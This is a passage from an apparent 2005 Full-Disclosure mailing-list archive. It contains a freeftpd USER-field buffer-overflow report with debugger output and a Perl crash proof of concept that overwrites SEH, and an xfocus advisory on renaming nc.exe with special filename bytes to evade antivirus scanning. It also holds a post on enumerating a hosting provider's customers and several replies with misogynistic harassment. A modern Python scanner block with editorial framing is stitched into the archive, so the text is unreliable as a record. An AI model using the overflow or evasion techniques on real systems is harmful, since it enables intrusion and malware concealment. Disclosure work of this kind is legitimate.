  Size/MD5:   155374 c617a31cf7408ff7ccc6dcf544e766a1

http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf-gnome-dev_0.22.0-7ubuntu1.2_amd64.deb
  Size/MD5: 8520 09e152c4a295c6b3b6e52375e0355e43

http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf-gnome2_0.22.0-7ubuntu1.2_amd64.deb
  Size/MD5: 7936 baecd3a2aca1cb678e652782da890483

http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf2_0.22.0-7ubuntu1.2_amd64.deb
  Size/MD5:   183498 080cdd7e1cb08979fc0140a191baf418

http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/libgtk2.0-0_2.4.10-1ubuntu1.2_amd64.deb
  Size/MD5:  2184102 04a8f1b3e01bf5618f5d8b70645be6bb

http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/libgtk2.0-bin_2.4.10-1ubuntu1.2_amd64.deb
  Size/MD5:13932 9ed21c2bb288a11e4ca2436f4757abda

http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/libgtk2.0-dbg_2.4.10-1ubuntu1.2_amd64.deb
  Size/MD5: 10299800 a385ad242f16a96a1ba27b8945255856

http://security.ubuntu.com/ubuntu/pool/main/g/gtk+2.0/libgtk2.0-dev_2.4.10-1ubuntu1.2_amd64.deb
  Size/MD5:  2841762 39311a1c6efc513741b6d38cd1b38f68

  i386 architecture (x86 compatible Intel/AMD)


http://security.ubuntu.com/ubuntu/pool/universe/g/gtk+2.0/gtk2.0-examples_2.4.10-1ubuntu1.2_i386.deb
  Size/MD5:   258802 74c64c0bc8320c3452d63f9c4dfe4579

http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf-dev_0.22.0-7ubuntu1.2_i386.deb
  Size/MD5:   147244 70d3c463e5158902c8218806cf9bea26

http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf-gnome-dev_0.22.0-7ubuntu1.2_i386.deb
  Size/MD5: 7646 46d4bf959232f67c91d79fbd65c8dcf6

http://security.ubuntu.com/ubuntu/pool/main/g/gdk-pixbuf/libgdk-pixbuf-gnome2_0.22.0-7ubuntu1.2_i386.deb
  

Re: [Full-disclosure] Meeting Room Names

2005-11-16 Thread Andreas Sons

Native.Code wrote:
> Something not related to vulnerabilities you guys are requested to
> suggest names for our meeting rooms. We don't want to call them with sad
> names like Room A, Board Room etc. but something interesting.

Our office in Bavaria, Germany, is located in an old house with stucco
under the ceiling, big candelabra in the rooms and the corridor and
similar decorations around. It just looks like they made the 1955 "Sissi"
movie with Romy Schneider in these rooms. So we named the rooms with names
from the Habsburg dynasty, starting with the CEO's office "Princess Sissi"
(he really disliked it), but the conference room became the "Franz
Ferdinand" room, the Austrian prince who was murdered in
Sarajevo which led to World War 1.

Andreas


[Full-disclosure] freeftpd USER bufferoverflow

2005-11-16 Thread barabas mutsonline
Hi,
 
While drooling over my new Adriana Lima wallpaper, my tongue accidentally hit my keyboard and more than 1012 chars were sent to the login screen of my freeftpd server (which I use to backup my Adriana Lima pics). Guess what... the server crashed! Luckily I attach ollydbg to every process I have running and this is what I found:

ECX 50505050
EIP 77C460CB msvcrt.77C460CB
Log data, item 0 Address=77C460CB Message=Access violation when reading [50505050]
77C460CB   8B01 MOV EAX,DWORD PTR DS:[ECX]

Well, EIP doesn't get overwritten, but SEH does:

0012B6CC   41414141
0012B6D0   42424242
0012B6D4   42424242
0012B6D8   43434343  Pointer to next SEH record
0012B6DC   47464544  SE handler
EIP 47464544
Log data, item 0 Address=47464544 Message=Access violation when executing [47464544]

I leave the exploit coding as an exercise...

enjoy

sample crash code:

#!/usr/bin/perl -w
# freeftpd USER buffer overflow
# barabas - 2005
use strict;
use Net::FTP;

my $user = "\x41" x 1011;        # fill the USER buffer
$user .= "\x44\x45\x46\x47";     # overwrite SEH
$user .= "\x50" x 400;

my $ftp = Net::FTP->new("127.0.0.1", Debug => 1)
    or die "Cannot connect: $@";
$ftp->login($user, "whatevah");
 

Re: [Full-disclosure] Was: n3td3v.com, now: C.Meinel

2005-11-16 Thread Marco Ermini
On 11/16/05, Byron Sonne <[EMAIL PROTECTED]> wrote:
>  > Carolyn Meinel wrote:
>
> I'd be wary of anything Ms. Meinel has to say:
> http://attrition.org/errata/charlatan/shame/index2.html
>
> The info's old but some leopards don't change their spots.

Please don't ever think to put the discussion on the level of personal
attacks. No one is interested, and it's only in the interests of those
more-or-less-real or supposed-to-be-real spammers. Moreover, I cannot
understand how a more-or-less "clean" or "troubled" personal
background could change the topic itself, or what the problem is if a
person changed her own job or had troubles with the FBI or KGB or whatever
- being incriminated or asked to testify is sometimes separated by a
thin line (I don't know about the USA police, but I know the Italian one.
They called me to testify on a bankrupt company because they found
the company's name in my CV using Google, since I worked for them as a
contractor many years before... you can understand how smart they
are). Anyway, these are her problems only - she didn't spam the
list... this is sufficient for me.

Personally I am always diffident towards those supposed first-hour experts,
hacking Linux since 0.91 or BSD since 2.0... these are just morons,
single-minded persons unable to think out of the box (sorry if this
could offend someone, it is not my intention).

This is my first and last post on this topic. Please stop it.


Cheers
--
Marco Ermini
Dubium sapientiae initium. (Descartes)
[EMAIL PROTECTED] # mount -t life -o ro /dev/dna /genetic/research
(This message is for the designated recipient only and may contain
privileged or confidential information. If you have received it in
error, please notify the sender immediately and delete the original.)


[Full-disclosure] Re: [xfocus-AD-051115]Multiple antivirus failed to scan malicious filename bypass vulnerability

2005-11-16 Thread Marco Monicelli
Alert7, you forgot to test the vulnerability on the NOD32 antivirus. It's
actually a very famous and quite reliable product, so I think you should
definitely test it too.

Cheers

Yog-Sotho





   
From: [EMAIL PROTECTED]
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com, [EMAIL PROTECTED]
Date: 15/11/2005 06.59
Subject: [xfocus-AD-051115]Multiple antivirus failed to scan malicious filename bypass vulnerability

[xfocus-AD-051115]Multiple antivirus failed to scan malicious filename
bypass vulnerability

discovered by [EMAIL PROTECTED]
class: design error
Threat level: medium


Vulnerable anti-virus Engine:

Kaspersky Antivirus
Symantec AntiVirus
F-Prot Antivirus
ClamWin Antivirus
Avast Antivirus
RAV AntiVirus
Microsoft AntiSpyware

tested anti-virus vendor:

Symantec AntiVirus Corporate 8.0
Kaspersky Antivirus Personal Pro 4.5.0.104
Kaspersky Antivirus For MS NTServer 4.5.0.104
F-Prot Antivirus 3.16c
ClamWin Antivirus 0.87
Avast.Professional.Edition.v4.6.603
RAV.AntiVirus.Desktop.v8.6
Microsoft AntiSpyware beta1


1.Summary:


   Windows systems may use many kinds of special marks in a filename;
some anti-virus engines are unable to analyze such specially structured
filenames, and thus fail to operate on the file.


2. Detail:

   Demonstration here:

   Choose a malicious file which would be detected, such as nc.exe,
and rename the file to nc??.exe (?? = hex C0 D7 BA DC)

   Then these malicious files will not be detected by an antivirus scan.

   Because these special names cannot be entered directly, if you
want to run these files you should use the following way:

   [EMAIL PROTECTED]:\Vul\bugtrap]#dir /x

   1998-01-03  14:37            59,392 NC294E~1.EXE nc??.exe

   [EMAIL PROTECTED]:\Vul\bugtrap]#NC294E~1.EXE -help
   [v1.10 NT]
   connect to somewhere:   nc [-options] hostname port[s] [ports] ...
   listen for inbound: nc -l -p port [options] [hostname] [port]
   options:

   Using the MS-DOS name specification, we can operate on the file with
Open, Read, Write, and duplicate.

   In fact most vendors have this problem when parsing this kind of
file: for instance, right-clicking these kinds of files shows no scan
option in the menu for Kaspersky antivirus, and Symantec AntiVirus
Corporate V10.0.1.1000 will detect it but can't remove it. The file
passes AVG Anti-Virus' normal path scan method, but AVG can't read
the file if you click the scan option menu.


3. Credits:

   Thanks to [EMAIL PROTECTED] for translating it; thanks to all members of
the xfocus team and all who support the xfocus team.


4. About xfocus:


 Xfocus is a non-profit and free technology organization which was
founded in 1998 in China. We are devoted to research and demonstration
of weaknesses related to network services and communication security.

 homepage http://www.xfocus.org/

-EOF

--

Kind Regards,

---
[EMAIL PROTECTED]

XFOCUS Security Team
http://www.xfocus.org



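The advisory above does not say why the engines fail on such a name. The following added example (not xfocus's code) assumes one likely cause, the scanner re-encoding the filename before opening it, and shows a content-hash scan loop that enumerates and opens files by the exact byte string the filesystem returns, so a name carrying the advisory's bytes C0 D7 BA DC is still scanned. The sample files, their content and the signature hash are constructed; the fixture needs a filesystem that accepts arbitrary filename bytes (Linux).

```python
# Added example, not from the xfocus advisory: enumerate and open files by
# the raw bytes the filesystem returns, so an untypeable or non-ASCII name
# (the advisory's nc??.exe) cannot be skipped by a name round-trip failure.
# Assumption (not stated in the advisory): the engines failed because they
# re-encoded the name before opening the file.
import hashlib
import os
import tempfile
from typing import Dict, List

def sha256_of(path: bytes) -> str:
    """SHA-256 of a file opened by its bytes path (no encode/decode step)."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def scan_dir(root: bytes, bad_hashes: Dict[str, str]) -> List[str]:
    """Return 'signature name' strings for files whose content hash is known-bad."""
    hits = []
    for entry in os.scandir(root):            # bytes root -> bytes entry.path
        if entry.is_file(follow_symlinks=False):
            digest = sha256_of(entry.path)
            if digest in bad_hashes:
                # Decode only for reporting; surrogateescape preserves odd bytes.
                name = entry.name.decode("utf-8", "surrogateescape")
                hits.append(f"{bad_hashes[digest]} {name}")
    return hits

def demo() -> List[str]:
    """Constructed fixture: one benign file and one 'bad' file whose name is
    nc.exe with the advisory's bytes C0 D7 BA DC inserted before '.exe'."""
    payload = b"CONSTRUCTED-SAMPLE-NOT-MALWARE"
    signatures = {hashlib.sha256(payload).hexdigest(): "Constructed.Sample"}
    with tempfile.TemporaryDirectory() as d:
        root = os.fsencode(d)
        with open(os.path.join(root, b"readme.txt"), "wb") as f:
            f.write(b"hello")
        with open(os.path.join(root, b"nc\xc0\xd7\xba\xdc.exe"), "wb") as f:
            f.write(payload)
        return scan_dir(root, signatures)

if __name__ == "__main__":
    print(demo())
```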


Re: [Full-disclosure] Three years and ten months without a patch

2005-11-16 Thread Marco Ermini
On 11/15/05, InfoSecBOFH <[EMAIL PROTECTED]> wrote:
> So why not start teaching some lessons David and release exploit code.
>  It seems that is the only way they learn and take thing seriously.

This software rarely ran outside what is considered a "secured"
environment - I mean, it is rarely exposed on the Internet/DMZs. Usually
Oracle DBs (especially these older versions which didn't have so much
web application software) are used just as database back ends, which
communicate with DMZs through multiple firewall levels (I am not
justifying them in any way, I am just guessing why they may not care
so much). Security is often considered not important - especially if
you can "inexpensively" upgrade to a 9.x or 10.x or 11.x software
version which "never breaks"...


Cheers.
--
Marco Ermini
Dubium sapientiae initium. (Descartes)
[EMAIL PROTECTED] # mount -t life -o ro /dev/dna /genetic/research


RE: [Full-disclosure] Was: n3td3v.com, SHUT THE FUCK UP!

2005-11-16 Thread ad








Damn, shut the fuck up, all you bunch of kiddies
searching for friends, and leave FD for what it is, SECURITY!

From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On behalf of poo
Sent: Wednesday 16 November 2005 10:05
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Was: n3td3v.com, now: C.Meinel

throw the filthy wench off the starboard bow yaaar

On 11/16/05, InfoSecBOFH <[EMAIL PROTECTED]> wrote:

On 11/15/05, Byron Sonne <[EMAIL PROTECTED]> wrote:
>  > Carolyn Meinel wrote:
>
> I'd be wary of anything Ms. Meinel has to say:
> http://attrition.org/errata/charlatan/shame/index2.html
>
> The info's old but some leopards don't change their spots.

and some never deserved their spots in the first place...

--
smile tomorrow will be worse


Re: [Full-disclosure] How to discover customers of hosting company for n3td3v.com

2005-11-16 Thread poo
hey carolyn where the nekkid pics at?

On 11/15/05, Epic <[EMAIL PROTECTED]> wrote:
Carolyn Meinel wrote:
> That silly post about n3td3v.com led to fun playtimes with the
> Scottsdale, AZ web farm that hosts it.
>
> Name:    n3td3v.com
> Address: 64.202.167.129
>
> Nslookup of 64.202.167.129 gives:
> Name:    pwdynamic-v02.prod.mesa1.secureserver.net
> Address: 64.202.167.120
>
> A traceroute of 64.202.167.129 gives its IP address
> as ip-64-202-167-129.secureserver.net.
>
> Want to know all the fun customers using websites on related
> secureserver.net servers? Insert numbers per examples:
> http://documents.secureserver.net/show/document.aspx?plvid=1&name=stats_eula
> (GoDaddy.com)
> http://documents.secureserver.net/show/document.aspx?plvid=2&name=stats_eula
> ...
> http://documents.secureserver.net/show/document.aspx?plvid=111702&name=stats_eula
> etc.
>
> How does one develop the procedure for uncovering all these users as
> noted above? That is left as an exercise for the student. Hint: it is
> trivial.
>
> Carolyn Meinel
> http://techbroker.com
> http://happyhacker.org
> 505-281-9675

Whoa. Absolutely stunning.

--
smile tomorrow will be worse


Re: [Full-disclosure] Was: n3td3v.com, now: C.Meinel

2005-11-16 Thread poo
throw the filthy wench off the starboard bow yaaar

On 11/16/05, InfoSecBOFH <[EMAIL PROTECTED]> wrote:
On 11/15/05, Byron Sonne <[EMAIL PROTECTED]> wrote:
>  > Carolyn Meinel wrote:
>
> I'd be wary of anything Ms. Meinel has to say:
> http://attrition.org/errata/charlatan/shame/index2.html
>
> The info's old but some leopards don't change their spots.

and some never deserved their spots in the first place...

--
smile tomorrow will be worse


Re: [Full-disclosure] Not the real n3td3v

2005-11-16 Thread poo
yeah we want gobbles !!
gobble gobble gobble

On 11/15/05, Rembrandt <[EMAIL PROTECTED]> wrote:
On Tue, 15 Nov 2005 12:21:02 -0600 n3td3v n3td3v <[EMAIL PROTECTED]> wrote:
> People,
> actions such as this are what keeps these things going.
ack
> Until people just ignore idiots it will still happen.
ack
> You expect to send something like this to a person and expect them to go
> away?
Yes "they" do
It's interesting how many people answer to such mails.
Isn't it? ;-)

Kind regards,
Rembrandt

--
smile tomorrow will be worse